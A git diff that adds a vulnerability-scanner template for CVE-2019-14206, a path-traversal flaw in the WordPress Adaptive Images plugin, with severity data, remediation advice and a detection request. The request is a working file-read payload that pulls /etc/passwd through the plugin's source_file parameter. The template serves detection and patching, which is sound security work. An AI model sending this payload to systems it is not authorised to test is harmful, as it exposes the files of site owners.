diff --git a/http/cves/2019/CVE-2019-14206.yaml b/http/cves/2019/CVE-2019-14206.yaml new file mode 100644 index 000000000000..a8c1d91e16f8 --- /dev/null +++ b/http/cves/2019/CVE-2019-14206.yaml @@ -0,0 +1,41 @@ +id: CVE-2019-14206 + +info: + name: WordPress Nevma Adaptive Images <0.6.67 - Arbitrary File Deletion / LFI + author: cascade + severity: high + description: | + The WordPress Nevma Adaptive Images plugin before 0.6.67 contains unsafe handling of user input in adaptive-images-script.php, enabling arbitrary file deletion and file read. An attacker can control the path used by the cache mechanism and read sensitive files (e.g., /etc/passwd) or delete arbitrary files. + impact: | + Successful exploitation can read sensitive files or delete arbitrary files accessible to the web server user, leading to information disclosure, denial of service, or further compromise. + remediation: | + Update the plugin to version 0.6.67 or later where input sanitization was added. + reference: + - https://markgruffer.github.io/2019/07/19/adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.html + - https://github.com/markgruffer/markgruffer.github.io/blob/master/_posts/2019-07-19-adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.markdown + - https://nvd.nist.gov/vuln/detail/CVE-2019-14206 + classification: + cve-id: CVE-2019-14206 + cwe-id: CWE-22 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H + cvss-score: 9.1 + epss-score: 0.04139 + epss-percentile: 0.91415 + cpe: cpe:2.3:a:nevma:adaptive_images:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + verified: true + tags: cve,cve2019,wordpress,wp-plugin,lfi,wp,adaptive-images + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=/etc/passwd" + + matchers: + - type: dsl + dsl: + - "regex('root:.*:0:0:', body)" + - 'contains(body, "adaptive-images")' + - "status_code == 200" + condition: and